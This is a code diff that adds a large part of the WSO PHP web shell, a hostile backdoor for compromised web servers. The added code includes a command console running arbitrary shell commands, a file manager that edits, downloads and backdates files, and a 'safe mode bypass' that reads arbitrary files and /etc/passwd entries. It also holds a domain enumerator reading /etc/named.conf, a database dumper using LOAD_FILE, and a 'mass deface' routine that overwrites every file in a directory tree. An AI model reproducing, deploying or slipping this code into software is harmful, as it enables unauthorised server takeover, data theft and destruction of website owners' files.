+                                                    echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');"><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
+                                                    $l = $l ? 0 : 1;
+                                                }
+                                                echo "<tr><td colspan=7>
+	<input type=hidden name=a value='FilesMan'>
+	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
+	<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
+	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
+                                                if (class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
+                                                if (!empty($_SESSION['act']) && @count($_SESSION['f'])) echo "<option value='paste'>Paste / zip</option>";
+                                                echo "</select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>";
+                                                wsoFooter();
+                                            }
+                                            function actionStringTools() {
+                                                if (!function_exists('hex2bin')) {
+                                                    function hex2bin($p) {
+                                                        return decbin(hexdec($p));
+                                                    }
+                                                }
+                                                if (!function_exists('binhex')) {
+                                                    function binhex($p) {
+                                                        return dechex(bindec($p));
+                                                    }
+                                                }
+                                                if (!function_exists('hex2ascii')) {
+                                                    function hex2ascii($p) {
+                                                        $r = '';
+                                                        for ($i = 0;$i < strLen($p);$i+= 2) {
+                                                            $r.= chr(hexdec($p[$i] . $p[$i + 1]));
+                                                        }
+                                                        return $r;
+                                                    }
+                                                }
+                                                if (!function_exists('ascii2hex')) {
+                                                    function ascii2hex($p) {
+                                                        $r = '';
+                                                        for ($i = 0;$i < strlen($p);++$i) $r.= sprintf('%02X', ord($p[$i]));
+                                                        return strtoupper($r);
+                                                    }
+                                                }
+                                                if (!function_exists('full_urlencode')) {
+                                                    function full_urlencode($p) {
+                                                        $r = '';
+                                                        for ($i = 0;$i < strlen($p);++$i) $r.= '%' . dechex(ord($p[$i]));
+                                                        return strtoupper($r);
+                                                    }
+                                                }
+                                                $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',);
+                                                if (isset($_POST['ajax'])) {
+                                                    $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true;
+                                                    ob_start();
+                                                    if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']);
+                                                    $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
+
	\'") . "';
+";
+                                                    echo strlen($temp), "
+", $temp;
+                                                    exit;
+                                                }
+                                                wsoHeader();
+                                                echo '<h1>String conversions</h1><div class=content>';
+                                                if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = false;
+                                                echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
+                                                foreach ($stringTools as $k => $v) echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
+                                                echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
+                                                if (!empty($_POST['p1'])) {
+                                                    if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
+                                                }
+                                                echo "</pre></div><br><h1>Search text in files:</h1><div class=content>
+		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
+			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
+			<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
+			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
+			<tr><td></td><td><input type='submit' value='>>'></td></tr>
+			</table></form>";
+                                                function wsoRecursiveGlob($path) {
+                                                    if (substr($path, -1) != '/') $path.= '/';
+                                                    $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
+                                                    if (is_array($paths) && @count($paths)) {
+                                                        foreach ($paths as $item) {
+                                                            if (@is_dir($item)) {
+                                                                if ($path != $item) wsoRecursiveGlob($item);
+                                                            } else {
+                                                                if (@strpos(@file_get_contents($item), @$_POST['p2']) !== false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\")'>" . htmlspecialchars($item) . "</a><br>";
+                                                            }
+                                                        }
+                                                    }
+                                                }
+                                                if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']);
+                                                echo "</div><br><h1>Search for hash:</h1><div class=content>
+		<form method='post' target='_blank' name='hf'>
+			<input type='text' name='hash' style='width:200px;'><br>
+			<input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
+			<input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
+			<input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
+			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
+			<input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
+		</form></div>";
+                                                wsoFooter();
+                                            }
+                                            function actionFilesTools() {
+                                                if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
+                                                if (@$_POST['p2'] == 'download') {
+                                                    if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
+                                                        ob_start("ob_gzhandler", 4096);
+                                                        header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
+                                                        if (function_exists("mime_content_type")) {
+                                                            $type = @mime_content_type($_POST['p1']);
+                                                            header("Content-Type: " . $type);
+                                                        }
+                                                        $fp = @fopen($_POST['p1'], "r");
+                                                        if ($fp) {
+                                                            while (!@feof($fp)) echo @fread($fp, 1024);
+                                                            fclose($fp);
+                                                        }
+                                                    }
+                                                    exit;
+                                                }
+                                                if (@$_POST['p2'] == 'mkfile') {
+                                                    if (!file_exists($_POST['p1'])) {
+                                                        $fp = @fopen($_POST['p1'], 'w');
+                                                        if ($fp) {
+                                                            $_POST['p2'] = "edit";
+                                                            fclose($fp);
+                                                        }
+                                                    }
+                                                }
+                                                wsoHeader();
+                                                echo '<h1>File tools</h1><div class=content>';
+                                                if (!file_exists(@$_POST['p1'])) {
+                                                    echo 'File not exists';
+                                                    wsoFooter();
+                                                    return;
+                                                }
+                                                $uid = @posix_getpwuid(@fileowner($_POST['p1']));
+                                                if (!$uid) {
+                                                    $uid['name'] = @fileowner($_POST['p1']);
+                                                    $gid['name'] = @filegroup($_POST['p1']);
+                                                } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+                                                echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
+                                                echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
+                                                if (empty($_POST['p2'])) $_POST['p2'] = 'view';
+                                                if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
+                                                else $m = array('Chmod', 'Rename', 'Touch');
+                                                foreach ($m as $v) echo '<a href=# onclick="g(null,null,null,\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
+                                                echo '<br><br>';
+                                                switch ($_POST['p2']) {
+                                                    case 'view':
+                                                        echo '<pre class=ml1>';
+                                                        $fp = @fopen($_POST['p1'], 'r');
+                                                        if ($fp) {
+                                                            while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
+                                                            @fclose($fp);
+                                                        }
+                                                        echo '</pre>';
+                                                        break;
+                                                    case 'highlight':
+                                                        if (@is_readable($_POST['p1'])) {
+                                                            echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
+                                                            $code = @highlight_file($_POST['p1'], true);
+                                                            echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
+                                                        }
+                                                        break;
+                                                    case 'chmod':
+                                                        if (!empty($_POST['p3'])) {
+                                                            $perms = 0;
+                                                            for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
+                                                            if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
+                                                        }
+                                                        clearstatcache();
+                                                        echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
+                                                        break;
+                                                    case 'edit':
+                                                        if (!is_writable($_POST['p1'])) {
+                                                            echo 'File isn\'t writeable';
+                                                            break;
+                                                        }
+                                                        if (!empty($_POST['p3'])) {
+                                                            $time = @filemtime($_POST['p1']);
+                                                            $_POST['p3'] = substr($_POST['p3'], 1);
+                                                            $fp = @fopen($_POST['p1'], "w");
+                                                            if ($fp) {
+                                                                @fwrite($fp, $_POST['p3']);
+                                                                @fclose($fp);
+                                                                echo 'Saved!<br><script>p3_="";</script>';
+                                                                @touch($_POST['p1'], $time, $time);
+                                                            }
+                                                        }
+                                                        echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
+                                                        $fp = @fopen($_POST['p1'], 'r');
+                                                        if ($fp) {
+                                                            while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
+                                                            @fclose($fp);
+                                                        }
+                                                        echo '</textarea><input type=submit value=">>"></form>';
+                                                        break;
+                                                    case 'hexdump':
+                                                        $c = @file_get_contents($_POST['p1']);
+                                                        $n = 0;
+                                                        $h = array('00000000<br>', '', '');
+                                                        $len = strlen($c);
+                                                        for ($i = 0;$i < $len;++$i) {
+                                                            $h[1].= sprintf('%02X', ord($c[$i])) . ' ';
+                                                            switch (ord($c[$i])) {
+                                                                case 0:
+                                                                    $h[2].= ' ';
+                                                                break;
+                                                                case 9:
+                                                                    $h[2].= ' ';
+                                                                break;
+                                                                case 10:
+                                                                    $h[2].= ' ';
+                                                                break;
+                                                                case 13:
+                                                                    $h[2].= ' ';
+                                                                break;
+                                                                default:
+                                                                    $h[2].= $c[$i];
+                                                                break;
+                                                            }
+                                                            $n++;
+                                                            if ($n == 32) {
+                                                                $n = 0;
+                                                                if ($i + 1 < $len) {
+                                                                    $h[0].= sprintf('%08X', $i + 1) . '<br>';
+                                                                }
+                                                                $h[1].= '<br>';
+                                                                $h[2].= "
+";
+                                                            }
+                                                        }
+                                                        echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
+                                                        break;
+                                                    case 'rename':
+                                                        if (!empty($_POST['p3'])) {
+                                                            if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
+                                                            else die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
+                                                        }
+                                                        echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
+                                                        break;
+                                                    case 'touch':
+                                                        if (!empty($_POST['p3'])) {
+                                                            $time = strtotime($_POST['p3']);
+                                                            if ($time) {
+                                                                if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
+                                                                else echo 'Touched!';
+                                                            } else echo 'Bad time format!';
+                                                        }
+                                                        clearstatcache();
+                                                        echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
+                                                        break;
+                                                    }
+                                                    echo '</div>';
+                                                    wsoFooter();
+                                                }
+                                                function actionSafeMode() {
+                                                    $temp = '';
+                                                    ob_start();
+                                                    switch ($_POST['p1']) {
+                                                        case 1:
+                                                            $temp = @tempnam($test, 'cx');
+                                                            if (@copy("compress.zlib://" . $_POST['p2'], $temp)) {
+                                                                echo @file_get_contents($temp);
+                                                                unlink($temp);
+                                                            } else echo 'Sorry... Can\'t open file';
+                                                            break;
+                                                        case 2:
+                                                            $files = glob($_POST['p2'] . '*');
+                                                            if (is_array($files)) foreach ($files as $filename) echo $filename . "
+";
+                                                            break;
+                                                        case 3:
+                                                            $ch = curl_init("file://" . $_POST['p2'] . "" . preg_replace('!\(\d+\)\s.*!', '', __FILE__));
+                                                            curl_exec($ch);
+                                                            break;
+                                                        case 4:
+                                                            ini_restore("safe_mode");
+                                                            ini_restore("open_basedir");
+                                                            include ($_POST['p2']);
+                                                            break;
+                                                        case 5:
+                                                            for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
+                                                                $uid = @posix_getpwuid($_POST['p2']);
+                                                                if ($uid) echo join(':', $uid) . "
+";
+                                                            }
+                                                            break;
+                                                        }
+                                                        $temp = ob_get_clean();
+                                                        wsoHeader();
+                                                        echo '<h1>Safe mode bypass</h1><div class=content>';
+                                                        echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
+                                                        if ($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">' . htmlspecialchars($temp) . '</pre>';
+                                                        echo '</div>';
+                                                        wsoFooter();
+                                                    }
+                                                    function actionConsole() {
+                                                        if (isset($_POST['ajax'])) {
+                                                            $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true;
+                                                            ob_start();
+                                                            echo "document.cf.cmd.value='';
+";
+                                                            $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
+$ " . $_POST['p1'] . "
+" . wsoEx($_POST['p1']), "
+
	\'"));
+                                                            if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
+                                                                if (@chdir($match[1])) {
+                                                                    $GLOBALS['cwd'] = @getcwd();
+                                                                    echo "document.mf.c.value='" . $GLOBALS['cwd'] . "';";
+                                                                }
+                                                            }
+                                                            echo "document.cf.output.value+='" . $temp . "';";
+                                                            echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
+                                                            $temp = ob_get_clean();
+                                                            echo strlen($temp), "
+", $temp;
+                                                            exit;
+                                                        }
+                                                        wsoHeader();
+                                                        echo "<script>
+if(window.Event) window.captureEvents(Event.KEYDOWN);
+var cmds = new Array('');
+var cur = 0;
+function kp(e) {
+	var n = (window.Event) ? e.which : e.keyCode;
+	if(n == 38) {
+		cur--;
+		if(cur>=0)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur++;
+	} else if(n == 40) {
+		cur++;
+		if(cur < cmds.length)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur--;
+	}
+}
+function add(cmd) {
+	cmds.pop();
+	cmds.push(cmd);
+	cmds.push('');
+	cur = cmds.length-1;
+}
+</script>";
+                                                        echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
+                                                        foreach ($GLOBALS['aliases'] as $n => $v) {
+                                                            if ($v == '') {
+                                                                echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
+                                                                continue;
+                                                            }
+                                                            echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
+                                                        }
+                                                        if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = false;
+                                                        echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 ' . (@$_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] ? 'checked' : '') . '> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
+                                                        if (!empty($_POST['p1'])) {
+                                                            echo htmlspecialchars("$ " . $_POST['p1'] . "
+" . wsoEx($_POST['p1']));
+                                                        }
+                                                        echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
+                                                        echo '</form></div><script>document.cf.cmd.focus();</script>';
+                                                        wsoFooter();
+                                                    }
+                                                    function actionSelfRemove() {
+                                                        if ($_POST['p1'] == 'yes') if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed');
+                                                        else echo 'unlink error!';
+                                                        if ($_POST['p1'] != 'yes') wsoHeader();
+                                                        echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
+                                                        wsoFooter();
+                                                    }
+                                                    //** updates
+                                                    function clear_fill($filo, $index) {
+                                                        if (file_exists($filo)) {
+                                                            $handle = fopen($filo, 'w');
+                                                            fwrite($handle, '');
+                                                            fwrite($handle, $index);
+                                                            fclose($handle);
+                                                        }
+                                                    }
+                                                    /////////
+                                                    function do_it() {
+                                                        global $dir, $index;
+                                                        chdir($dir);
+                                                        $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
+                                                        $filos = scandir($dir);
+                                                        $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", ".");
+                                                        sort($filos);
+                                                        $n = 0;
+                                                        echo "<center><textarea style='width: 950px; height: 300px;'>";
+                                                        foreach ($filos as $filo) {
+                                                            if ($filo != $me && is_dir($filo) != 1 && !in_array($filo, $notallow)) {
+                                                                echo "$dir/$filo ====> ";
+                                                                edit_file($filo, $index);
+                                                                flush();
+                                                                $n = $n + 1;
+                                                            }
+                                                        }
+                                                        echo "</textarea>";
+                                                        echo "<br>";
+                                                        echo "<br><h3>$n File Detected</h3></center><br>";
+                                                    }
+                                                    //////////////////////////////
+                                                    function ListFiles($dirall) {
+                                                        if ($dh = opendir($dirall)) {
+                                                            $filos = Array();
+                                                            $inner_files = Array();
+                                                            $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
+                                                            $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db");
+                                                            while ($filo = readdir($dh)) {
+                                                                if ($filo != "." && $filo != ".." && $filo[0] != '.' && !in_array($filo, $notallow)) {
+                                                                    if (is_dir($dirall . "/" . $filo)) {
+                                                                        $inner_files = ListFiles($dirall . "/" . $filo);
+                                                                        if (is_array($inner_files)) $filos = array_merge($filos, $inner_files);
+                                                                    } else {
+                                                                        array_push($filos, $dirall . "/" . $filo);
+                                                                    }
+                                                                }
+                                                            }
+                                                            closedir($dh);
+                                                            return $filos;
+                                                        }
+                                                    }
+                                                    //////////////////////////////////////////
+                                                    function do_it_all() {
+                                                        global $index;
+                                                        $dirall = $_POST['dir'];
+                                                        echo "<center><textarea style='width: 950px; height: 300px;'>";
+                                                        echo "Blowing All Files In Main Dir 
+ Task Started ;D 
+";
+                                                        foreach (ListFiles($dirall) as $key => $filo) {
+                                                            $filo = str_replace('//', "/", $filo);
+                                                            echo "$filo ===>";
+                                                            edit_file($filo, $index);
+                                                            flush();
+                                                        }
+                                                        echo "</textarea>";
+                                                        $key = $key + 1;
+                                                        echo "<br><h3>$key File Detected</h3></center><br>";
+                                                    }
+                                                    ////////
+                                                    function actionMass() {
+                                                        wsoHeader();
+                                                        echo "<h1>Mass Defeace All Files</h1><div class=content>
+            <form name='mass' onSubmit=\"g(null,null,'bpp',this.option.value);return false;\"><br>
+            <strong>Index Code Here :</strong><br>
+			<textarea placeholder='Please Put Your Index Or Domains here !!' name='index' class=bigarea></textarea><br><br>
+            <strong>Main Dir : </strong>
+			<input name='dir' style='width: 550px' type='text' value=" . getcwd() . "/> | <strong>Options : </strong>
+			<select name='option' style='width: 200px'>
+			<option> </option>
+			<option>Only for Selected Folder</option>
+			<option>For all Sub Folders</option>
+			</select>
+			<input name='indexit' type='submit' value='Brute It' style='width: 81px'><br></form>";
+                                                        if (isset($_POST['p1'])) {
+                                                            if ($_POST['indexit']) {
+                                                                if ($_POST['option'] == "Only for Selected Folder") {
+                                                                    do_it();
+                                                                } elseif ($_POST['option'] == "For all Sub Folders") {
+                                                                    do_it_all();
+                                                                } else {
+                                                                    echo "Please select one option to work on it !!";
+                                                                }
+                                                            }
+                                                        }
+                                                        wsoFooter();
+                                                    }
+                                                    function actionDomain() {
+                                                        wsoHeader();
+                                                        echo "<h1>Get All Server Domains</h1><div class=content>";
+                                                        $d0mains = @file("/etc/named.conf");
+                                                        if (!$d0mains) {
+                                                            echo "<br> Can't ReaD -> [/etc/named.conf]";
+                                                        } else {
+                                                            echo "<table align=center border=1>
+<tr><td><b><span style='color:red'>Domain</span></b></td><td><b><span style='color:red'>User</span></b></td></tr>";
+                                                            foreach ($d0mains as $d0main) {
+                                                                if (eregi("zone", $d0main)) {
+                                                                    preg_match_all('#zone "(.*)"#', $d0main, $domains);
+                                                                    flush();
+                                                                    if (strlen(trim($domains[1][0])) > 2) {
+                                                                        $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
+                                                                        echo "<tr><td><a target='_blank' href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
+                                                                        flush();
+                                                                    }
+                                                                }
+                                                            }
+                                                            echo "</table>
+<p align='center'>";
+                                                        }
+                                                        wsoFooter();
+                                                    }
+                                                    function actionSql() {
+                                                        class DbClass {
+                                                            var $type;
+                                                            var $link;
+                                                            var $res;
+                                                            function DbClass($type) {
+                                                                $this->type = $type;
+                                                            }
+                                                            function connect($host, $user, $pass, $dbname) {
+                                                                switch ($this->type) {
+                                                                    case 'mysql':
+                                                                        if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
+                                                                        break;
+                                                                    case 'pgsql':
+                                                                        $host = explode(':', $host);
+                                                                        if (!$host[1]) $host[1] = 5432;
+                                                                        if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function selectdb($db) {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            if (@mysql_select_db($db)) return true;
+                                                                            break;
+                                                                        }
+                                                                        return false;
+                                                                }
+                                                                function query($str) {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            return $this->res = @mysql_query($str);
+                                                                        break;
+                                                                        case 'pgsql':
+                                                                            return $this->res = @pg_query($this->link, $str);
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function fetch() {
+                                                                    $res = func_num_args() ? func_get_arg(0) : $this->res;
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            return @mysql_fetch_assoc($res);
+                                                                        break;
+                                                                        case 'pgsql':
+                                                                            return @pg_fetch_assoc($res);
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function listDbs() {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            return $this->res = @mysql_list_dbs($this->link);
+                                                                        break;
+                                                                        case 'pgsql':
+                                                                            return $this->res = $this->query("SELECT datname FROM pg_database");
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function listTables() {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            return $this->res = $this->query('SHOW TABLES');
+                                                                        break;
+                                                                        case 'pgsql':
+                                                                            return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'");
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function error() {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            return @mysql_error($this->link);
+                                                                        break;
+                                                                        case 'pgsql':
+                                                                            return @pg_last_error($this->link);
+                                                                        break;
+                                                                    }
+                                                                    return false;
+                                                                }
+                                                                function setCharset($str) {
+                                                                    switch ($this->type) {
+                                                                        case 'mysql':
+                                                                            if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
+                                                                            else $this->query('SET CHARSET ' . $str);
+                                                                            break;
+                                                                        case 'pgsql':
+                                                                            return @pg_set_client_encoding($this->link, $str);
+                                                                            break;
+                                                                        }
+                                                                        return false;
+                                                                    }
+                                                                    function loadFile($str) {
+                                                                        switch ($this->type) {
+                                                                            case 'mysql':
+                                                                                return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
+                                                                            break;
+                                                                            case 'pgsql':
+                                                                                $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
+                                                                                $r = array();
+                                                                                while ($i = $this->fetch()) $r[] = $i['file'];
+                                                                                $this->query('drop table wso2');
+                                                                                return array('file' => implode("
+", $r));
+                                                                                break;
+                                                                            }
+                                                                            return false;
+                                                                    }
+                                                                    function dump($table) {
+                                                                        switch ($this->type) {
+                                                                            case 'mysql':
+                                                                                $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
+                                                                                $create = mysql_fetch_array($res);
+                                                                                echo $create[1] . ";
+
+";
+                                                                                $this->query('SELECT * FROM `' . $table . '`');
+                                                                                while ($item = $this->fetch()) {
+                                                                                    $columns = array();
+                                                                                    foreach ($item as $k => $v) {
+                                                                                        $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
+                                                                                        $columns[] = "`" . $k . "`";
